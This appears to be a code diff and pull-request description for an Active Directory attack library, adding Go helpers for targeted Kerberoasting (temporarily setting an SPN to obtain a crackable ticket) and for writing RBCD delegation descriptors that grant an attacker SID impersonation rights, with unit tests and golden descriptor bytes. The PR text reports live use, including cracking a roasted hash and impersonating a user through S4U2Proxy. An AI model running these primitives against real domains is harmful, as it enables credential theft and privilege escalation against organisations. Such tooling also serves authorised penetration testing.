+// targetComputerDN, undoing WriteRBCD and restoring the target's original
+// (unset) delegation configuration.
+func (ldapSession *Session) ClearRBCD(targetComputerDN string) error {
+	if err := ldapSession.FlushAttributeValues(targetComputerDN, RBCDAttribute); err != nil {
+		return fmt.Errorf("rbcd: clear %s on %q: %w", RBCDAttribute, targetComputerDN, err)
+	}
+	return nil
+}

--- a/network/ldap/rbcd_test.go
+++ b/network/ldap/rbcd_test.go
@@ -1,0 +1,135 @@
+package ldap
+
+import (
+	"encoding/binary"
+	"encoding/hex"
+	"reflect"
+	"testing"
+
+	"github.com/TheManticoreProject/winacl/securitydescriptor"
+)
+
+// impacketRBCDVector is a known-good msDS-AllowedToActOnBehalfOfOtherIdentity
+// descriptor (captured from a reference implementation and confirmed accepted by
+// a live Windows KDC for S4U2Proxy). It allows a single attacker SID.
+const (
+	impacketRBCDSID   = "S-1-5-21-2802240253-752003275-3968249406-194953"
+	impacketRBCDBytes = "010004804000000000000000000000001400000004002c000100000000002400ff010f00010500000000000515000000fdca06a7cba8d22c3eae86ec89f9020001020000000000052000000020020000"
+)
+
+// TestBuildRBCDDescriptorGoldenVector checks BuildRBCDDescriptor reproduces the
+// exact bytes a Windows KDC accepts: ACL_REVISION_DS (4) and the specific
+// full-control mask 0x000F01FF, not GENERIC_ALL.
+func TestBuildRBCDDescriptorGoldenVector(t *testing.T) {
+	raw, err := BuildRBCDDescriptor(impacketRBCDSID)
+	if err != nil {
+		t.Fatalf("BuildRBCDDescriptor: %v", err)
+	}
+	if got := hex.EncodeToString(raw); got != impacketRBCDBytes {
+		t.Errorf("descriptor bytes mismatch:\n got  %s\n want %s", got, impacketRBCDBytes)
+	}
+}
+
+// TestBuildRBCDDescriptorRoundTrip builds the RBCD descriptor for a SID and
+// confirms it parses back to exactly that SID.
+func TestBuildRBCDDescriptorRoundTrip(t *testing.T) {
+	sid := "S-1-5-21-1004336348-1177238915-682003330-1123"
+	raw, err := BuildRBCDDescriptor(sid)
+	if err != nil {
+		t.Fatalf("BuildRBCDDescriptor: %v", err)
+	}
+
+	sids, err := ParseRBCDDescriptor(raw)
+	if err != nil {
+		t.Fatalf("ParseRBCDDescriptor: %v", err)
+	}
+	if want := []string{sid}; !reflect.DeepEqual(sids, want) {
+		t.Errorf("parsed SIDs: got %v want %v", sids, want)
+	}
+}
+
+// TestBuildRBCDDescriptorBytes checks the structural wire bytes of the descriptor
+// so a regression in the marshal path is caught with fixed expectations:
+// revision 1, SE_DACL_PRESENT, owner = BUILTIN\Administrators (S-1-5-32-544), a
+// DACL with exactly one ACCESS_ALLOWED ACE granting the specific full-control
+// mask 0x000F01FF, and the attacker SID as the trustee.
+func TestBuildRBCDDescriptorBytes(t *testing.T) {
+	sid := "S-1-5-21-1004336348-1177238915-682003330-1123"
+	raw, err := BuildRBCDDescriptor(sid)
+	if err != nil {
+		t.Fatalf("BuildRBCDDescriptor: %v", err)
+	}
+
+	if raw[0] != 0x01 {
+		t.Errorf("revision: got 0x%02x want 0x01", raw[0])
+	}
+	// Control flags (offset 2, LE uint16) must have SE_DACL_PRESENT (0x0004).
+	control := binary.LittleEndian.Uint16(raw[2:4])
+	if control&0x0004 == 0 {
+		t.Errorf("DACL-present flag not set in control 0x%04x", control)
+	}
+	// DACL revision (at OffsetDacl = 20) must be ACL_REVISION_DS (4).
+	if raw[20] != 4 {
+		t.Errorf("DACL revision: got %d want 4 (ACL_REVISION_DS)", raw[20])
+	}
+
+	// Re-parse and assert the ACE grants the specific full-control mask.
+	ntsd := securitydescriptor.NewSecurityDescriptor()
+	if _, err := ntsd.Unmarshal(raw); err != nil {
+		t.Fatalf("Unmarshal: %v", err)
+	}
+	owner := ntsd.GetOwner()
+	if owner == nil || owner.SID.String() != "S-1-5-32-544" {
+		t.Errorf("owner: got %v want BUILTIN\\Administrators (S-1-5-32-544)", owner)
+	}
+	dacl := ntsd.GetDacl()
+	if dacl == nil || len(dacl.Entries) != 1 {
+		t.Fatalf("expected exactly one DACL ACE, got %+v", dacl)
+	}
+	const fullControl = 0x000F01FF
+	if dacl.Entries[0].Mask.RawValue != fullControl {
+		t.Errorf("ACE mask: got 0x%08x want full-control 0x%08x", dacl.Entries[0].Mask.RawValue, fullControl)
+	}
+	if dacl.Entries[0].Identity.SID.String() != sid {
+		t.Errorf("ACE trustee: got %s want %s", dacl.Entries[0].Identity.SID.String(), sid)
+	}
+}
+
+// TestBuildRBCDDescriptorMultiSID confirms multiple allowed SIDs produce one ACE
+// each, in order.
+func TestBuildRBCDDescriptorMultiSID(t *testing.T) {
+	a := "S-1-5-21-1004336348-1177238915-682003330-1123"
+	b := "S-1-5-21-1004336348-1177238915-682003330-1124"
+	raw, err := BuildRBCDDescriptor(a, b)
+	if err != nil {
+		t.Fatalf("BuildRBCDDescriptor: %v", err)
+	}
+	sids, err := ParseRBCDDescriptor(raw)
+	if err != nil {
+		t.Fatalf("ParseRBCDDescriptor: %v", err)
+	}
+	if want := []string{a, b}; !reflect.DeepEqual(sids, want) {
+		t.Errorf("multi-SID: got %v want %v", sids, want)
+	}
+}
+
+// TestBuildRBCDDescriptorErrors covers empty input and an invalid SID.
+func TestBuildRBCDDescriptorErrors(t *testing.T) {
+	if _, err := BuildRBCDDescriptor(); err == nil {
+		t.Error("expected error with no SIDs")
+	}
+	if _, err := BuildRBCDDescriptor("not-a-sid"); err == nil {
+		t.Error("expected error for invalid SID")
+	}
+}
+
+// TestParseRBCDDescriptorEmpty confirms an empty attribute parses to no SIDs.
+func TestParseRBCDDescriptorEmpty(t *testing.T) {
+	sids, err := ParseRBCDDescriptor(nil)
+	if err != nil {
+		t.Fatalf("ParseRBCDDescriptor(nil): %v", err)
+	}
+	if sids != nil {
+		t.Errorf("expected nil SIDs for empty descriptor, got %v", sids)
+	}
+}

--- a/network/ldap/targeted_kerberoast.go
+++ b/network/ldap/targeted_kerberoast.go
@@ -1,0 +1,137 @@
+package ldap
+
+import (
+	"fmt"
+	"strings"
+)
+
+// Targeted Kerberoasting.
+//
+// A principal that can write the servicePrincipalName attribute of an account
+// (via GenericWrite / GenericAll / the Validated-SPN right, etc.) can make that
+// account roastable on demand even if it has no SPN of its own: set a temporary
+// SPN, request a service ticket for it (Kerberoast), then remove the SPN to
+// restore the account. The ticket's enc-part is encrypted with the account's
+// long-term key, so it can be cracked offline.
+//
+// The value of the SPN string itself is irrelevant to the KDC for roasting (any
+// syntactically valid, unique SPN works); the account key is what matters. The
+// helper below performs the set -> (caller-supplied roast) -> restore sequence
+// and always attempts to restore the attribute, even if the roast step fails.
+
+// ServicePrincipalNameAttribute is the LDAP attribute holding an account's SPNs.
+const ServicePrincipalNameAttribute = "servicePrincipalName"
+
+// GetServicePrincipalNames returns the servicePrincipalName values currently set
+// on the object identified by dn.
+func (ldapSession *Session) GetServicePrincipalNames(dn string) ([]string, error) {
+	entries, err := ldapSession.QueryBaseObject(dn, "(objectClass=*)", []string{ServicePrincipalNameAttribute})
+	if err != nil {
+		return nil, fmt.Errorf("targetedroast: read SPNs of %q: %w", dn, err)
+	}
+	if len(entries) == 0 {
+		return nil, fmt.Errorf("targetedroast: no entry returned for %q", dn)
+	}
+	return entries[0].GetAttributeValues(ServicePrincipalNameAttribute), nil
+}
+
+// AddServicePrincipalName adds a single servicePrincipalName value to dn without
+// disturbing any existing values.
+func (ldapSession *Session) AddServicePrincipalName(dn, spn string) error {
+	req := NewModifyRequest(dn)
+	req.Add(ServicePrincipalNameAttribute, []string{spn})
+	if err := ldapSession.Modify(req); err != nil {
+		return fmt.Errorf("targetedroast: add SPN %q to %q: %w", spn, dn, err)
+	}
+	return nil
+}
+
+// RemoveServicePrincipalName deletes a single servicePrincipalName value from dn.
+func (ldapSession *Session) RemoveServicePrincipalName(dn, spn string) error {
+	req := NewModifyRequest(dn)
+	req.Delete(ServicePrincipalNameAttribute, []string{spn})
+	if err := ldapSession.Modify(req); err != nil {
+		return fmt.Errorf("targetedroast: remove SPN %q from %q: %w", spn, dn, err)
+	}
+	return nil
+}
+
+// containsSPN reports whether spn is already present in spns (case-insensitive,
+// as SPN matching in Active Directory is case-insensitive).
+func containsSPN(spns []string, spn string) bool {
+	for _, s := range spns {
+		if strings.EqualFold(s, spn) {
+			return true
+		}
+	}
+	return false
+}
+
+// TargetedKerberoast temporarily sets spn on targetDN, invokes roast (which the
+// caller uses to request and format the service ticket for spn), and then
+// restores targetDN's servicePrincipalName attribute to exactly its prior state.
+//
+// The restore always runs, even if roast returns an error, so the target is not
+// left with an attacker-added SPN. If spn is already present on targetDN it is
+// left in place and not removed during restore (it was not added by this call).
+// The returned error is the roast error if any, otherwise the restore error.
+//
+// Example:
+//
+//	var result *kerberos.KerberoastResult
+//	err := session.TargetedKerberoast(userDN, "HTTP/roast."+realm, func() error {
+//	    var e error
+//	    result, e = kclient.Kerberoast("HTTP/roast." + realm)
+//	    return e
+//	})
+func (ldapSession *Session) TargetedKerberoast(targetDN, spn string, roast func() error) error {
+	return targetedKerberoast(ldapSession, targetDN, spn, roast)
+}
+
+// spnEditor abstracts the three servicePrincipalName operations the targeted
+// roast orchestration needs, so the set -> roast -> restore logic can be unit
+// tested against a fake in-memory directory as well as a live *Session.
+type spnEditor interface {
+	GetServicePrincipalNames(dn string) ([]string, error)
+	AddServicePrincipalName(dn, spn string) error
+	RemoveServicePrincipalName(dn, spn string) error
+}
+
+// targetedKerberoast is the editor-agnostic core of TargetedKerberoast.
+func targetedKerberoast(editor spnEditor, targetDN, spn string, roast func() error) error {
+	if strings.TrimSpace(spn) == "" {
+		return fmt.Errorf("targetedroast: empty SPN")
+	}
+	if roast == nil {
+		return fmt.Errorf("targetedroast: nil roast callback")
+	}
+
+	existing, err := editor.GetServicePrincipalNames(targetDN)
+	if err != nil {
+		return err
+	}
+
+	added := false
+	if !containsSPN(existing, spn) {
+		if err := editor.AddServicePrincipalName(targetDN, spn); err != nil {
+			return err
+		}
+		added = true
+	}
+
+	// Run the caller's roast, then always restore.
+	roastErr := roast()
+
+	var restoreErr error
+	if added {
+		restoreErr = editor.RemoveServicePrincipalName(targetDN, spn)
+	}
+
+	if roastErr != nil {
+		if restoreErr != nil {
+			return fmt.Errorf("targetedroast: roast failed (%v) and SPN restore failed (%w)", roastErr, restoreErr)
+		}
+		return roastErr
+	}
+	return restoreErr
+}

--- a/network/ldap/targeted_kerberoast_test.go
+++ b/network/ldap/targeted_kerberoast_test.go
@@ -1,0 +1,130 @@
+package ldap
+
+import (
+	"errors"
+	"reflect"
+	"testing"
+)
+
+// fakeSPNStore is an in-memory spnEditor for exercising the targeted-roast
+// set -> roast -> restore logic without a live directory.
+type fakeSPNStore struct {
+	spns    map[string][]string
+	addErr  error
+	delErr  error
+	getErr  error
+	addCall int
+	delCall int
+}
+
+func (f *fakeSPNStore) GetServicePrincipalNames(dn string) ([]string, error) {
+	if f.getErr != nil {
+		return nil, f.getErr
+	}
+	return append([]string(nil), f.spns[dn]...), nil
+}
+
+func (f *fakeSPNStore) AddServicePrincipalName(dn, spn string) error {
+	f.addCall++
+	if f.addErr != nil {
+		return f.addErr
+	}
+	f.spns[dn] = append(f.spns[dn], spn)
+	return nil
+}
+
+func (f *fakeSPNStore) RemoveServicePrincipalName(dn, spn string) error {
+	f.delCall++
+	if f.delErr != nil {
+		return f.delErr
+	}
+	kept := f.spns[dn][:0]
+	for _, s := range f.spns[dn] {
+		if s != spn {
+			kept = append(kept, s)
+		}
+	}
+	f.spns[dn] = kept
+	return nil
+}
+
+// TestTargetedKerberoastSetRestore verifies the SPN is added, the roast runs
+// while it is present, and the attribute is restored to its exact prior state.
+func TestTargetedKerberoastSetRestore(t *testing.T) {
+	dn := "CN=svc,DC=corp,DC=local"
+	store := &fakeSPNStore{spns: map[string][]string{dn: {"MSSQLSvc/db.corp.local"}}}
+	spn := "HTTP/roast.corp.local"
+
+	sawSPN := false
+	err := targetedKerberoast(store, dn, spn, func() error {
+		sawSPN = containsSPN(store.spns[dn], spn)
+		return nil
+	})
+	if err != nil {
+		t.Fatalf("targetedKerberoast: %v", err)
+	}
+	if !sawSPN {
+		t.Error("temp SPN was not present during the roast callback")
+	}
+	if store.addCall != 1 || store.delCall != 1 {
+		t.Errorf("expected one add and one remove, got add=%d del=%d", store.addCall, store.delCall)
+	}
+	if want := []string{"MSSQLSvc/db.corp.local"}; !reflect.DeepEqual(store.spns[dn], want) {
+		t.Errorf("SPNs not restored: got %v want %v", store.spns[dn], want)
+	}
+}
+
+// TestTargetedKerberoastRestoreOnError verifies the SPN is still removed when the
+// roast callback fails, and the roast error is surfaced.
+func TestTargetedKerberoastRestoreOnError(t *testing.T) {
+	dn := "CN=svc,DC=corp,DC=local"
+	store := &fakeSPNStore{spns: map[string][]string{dn: {}}}
+	spn := "HTTP/roast.corp.local"
+	roastErr := errors.New("kdc said no")
+
+	err := targetedKerberoast(store, dn, spn, func() error { return roastErr })
+	if !errors.Is(err, roastErr) {
+		t.Fatalf("expected roast error, got %v", err)
+	}
+	if store.delCall != 1 {
+		t.Errorf("expected the temp SPN to be removed on error, del=%d", store.delCall)
+	}
+	if len(store.spns[dn]) != 0 {
+		t.Errorf("SPNs not restored after error: %v", store.spns[dn])
+	}
+}
+
+// TestTargetedKerberoastAlreadyPresent verifies that if the SPN already exists it
+// is neither added nor removed (the account is left exactly as found).
+func TestTargetedKerberoastAlreadyPresent(t *testing.T) {
+	dn := "CN=svc,DC=corp,DC=local"
+	spn := "HTTP/roast.corp.local"
+	store := &fakeSPNStore{spns: map[string][]string{dn: {"http/ROAST.corp.local"}}} // case-insensitive match
+
+	err := targetedKerberoast(store, dn, spn, func() error { return nil })
+	if err != nil {
+		t.Fatalf("targetedKerberoast: %v", err)
+	}
+	if store.addCall != 0 || store.delCall != 0 {
+		t.Errorf("expected no add/remove when SPN already present, add=%d del=%d", store.addCall, store.delCall)
+	}
+}
+
+// TestTargetedKerberoastAddFails verifies that a failure to set the SPN aborts
+// before the roast and does not attempt a restore.
+func TestTargetedKerberoastAddFails(t *testing.T) {
+	dn := "CN=svc,DC=corp,DC=local"
+	store := &fakeSPNStore{spns: map[string][]string{dn: {}}, addErr: errors.New("access denied")}
+
+	ran := false
+	err := targetedKerberoast(store, dn, "HTTP/x.corp.local", func() error { ran = true; return nil })
+	if err == nil {
+		t.Fatal("expected an error when the SPN add fails")
+	}
+	if ran {
+		t.Error("roast callback should not run when the SPN could not be set")
+	}
+	if store.delCall != 0 {
+		t.Error("no restore should be attempted when nothing was added")
+	}
+}


### PR DESCRIPTION
### Linked Issue
`Closes #923`

### Summary
Implements the four offensive helpers requested in #923 on top of the existing native Kerberos, `attacks`, and LDAP machinery, plus two correctness fixes uncovered while validating the RBCD chain live against a domain controller.

### Helpers
- **John the Ripper output** (`network/kerberos/v5/attacks/john.go`): `FormatASREPHashJohn` / `FormatTGSHashJohn` produce `krb5asrep` / `krb5tgs` strings alongside the existing hashcat formatters, reusing the same checksum/edata split. The John forms differ subtly from hashcat's: RC4 AS-REP drops the `user@realm:` salt hashcat mode 18200 carries; AES (17/18) appends the truncated-HMAC checksum *after* the encrypted data with a `<UPPER-REALM><account>` salt; RC4 TGS matches hashcat mode 13100.
- **Targeted Kerberoasting** (`network/ldap/targeted_kerberoast.go`): `TargetedKerberoast` sets a temporary `servicePrincipalName` on a target account, runs a caller-supplied roast callback, and always restores the attribute to its exact prior state (restore even on roast error). SPN add/remove/read helpers back it.
- **RBCD write** (`network/ldap/rbcd.go`): `BuildRBCDDescriptor` / `WriteRBCD` / `ReadRBCD` / `ClearRBCD` build and manage the `msDS-AllowedToActOnBehalfOfOtherIdentity` security descriptor (owner `BA`, one Allow ACE per attacker SID), pairing with the existing S4U2Self→S4U2Proxy path.
- **Unconstrained-delegation extraction** (`network/kerberos/v5/gssapi/delegation.go`): `ExtractDelegatedCred` pulls a forwarded TGT out of an AP-REQ authenticator's GSS `0x8003` checksum (RFC 4121 §4.1.1 `DlgOpt`/`Dlgth`/`Deleg`), and `DecryptDelegatedCredPart` decrypts its KRB-CRED enc-part (key usage 14) for reuse. `GSSChecksumValueWithDelegation` provides the inverse for testing.

### Root Cause (fixes)
Two defects blocked the live RBCD S4U2Proxy chain and are fixed here:
1. **Empty cname in TGS-REQ** (`network/kerberos/v5/messages/kdcreqbody.go`): `MarshalPrincipalName` produced a non-nil (empty) `NameString` slice that the `optional` tag did not treat as empty, so every TGS-REQ carried an empty `cname` SEQUENCE. Windows tolerates it for ordinary TGS but rejects an S4U2Proxy that carries an (even empty) `cname` alongside the `cname-in-additional-ticket` option with `KDC_ERR_BADOPTION`. cname is now left at its zero value (and thus omitted) unless it carries a name; an AS-REQ always carries one, so it is unaffected.
2. **RBCD ACE rights/revision** (`network/ldap/rbcd.go`): the ACE must grant the specific full-control mask `0x000F01FF` under an `ACL_REVISION_DS` (4) DACL. A `GENERIC_ALL` (`0x10000000`) mask is not expanded by the KDC's access check on this attribute, so the ACE is ignored and delegation is denied. The descriptor is now built to the exact byte layout Windows honours.

### How Verified
- `go build ./...`, `go vet`, and `go test ./network/... ./windows/...` are green (259 packages ok).
- **Targeted Kerberoasting — live:** set a temp SPN on a controllable account, roasted an RC4 TGS, restored the SPN exactly (empty), removed the account. The resulting hash was cracked offline to the known password, confirming crackability.
- **RBCD — live:** wrote the descriptor onto a resource computer, ran S4U2Self→S4U2Proxy through it to obtain a service ticket impersonating another user, then cleared the attribute; a subsequent S4U2Proxy was correctly denied. Confirmed byte-for-byte that the built descriptor matches the reference wire format.
- **John format / delegation extraction:** unit-validated. Unconstrained-delegation extraction is not exercisable on the single-domain lab (no delegation-trusted service to coerce), so it is covered by a build→extract→decrypt round-trip unit test.

### Test Coverage
- **Added:** `attacks/john_test.go` (RC4/AES AS-REP + TGS format vectors), `ldap/rbcd_test.go` (golden reference bytes, structural bytes, build/parse round-trip, multi-SID, errors), `ldap/targeted_kerberoast_test.go` (set/restore, restore-on-error, already-present, add-fails, over a fake directory), `gssapi/delegation_test.go` (checksum round-trip, no-flag/truncated handling, full authenticator→KRB-CRED→EncKrbCredPart extraction).

### Scope of Change
- **Files changed:** `attacks/john.go`(+test), `ldap/rbcd.go`(+test), `ldap/targeted_kerberoast.go`(+test), `gssapi/delegation.go`(+test), `crypto/crypto.go` (export `KeyUsageKRBCredEncPart`), `messages/kdcreqbody.go` (cname fix).
- **Submodule pointer updated:** no.
- **Behavioral changes outside the helpers:** the TGS-REQ cname omission is a spec-compliance fix shared by all TGS exchanges; it makes Manticore's requests match Windows/standard clients and is covered by the existing kerberos test suite.

### Risk and Rollout
Low. The cname change only removes an empty optional field from TGS-REQ (AS-REQ path unchanged and still carries cname); all existing kerberos, SMB, RPC, and LDAP tests pass. The new helpers are additive.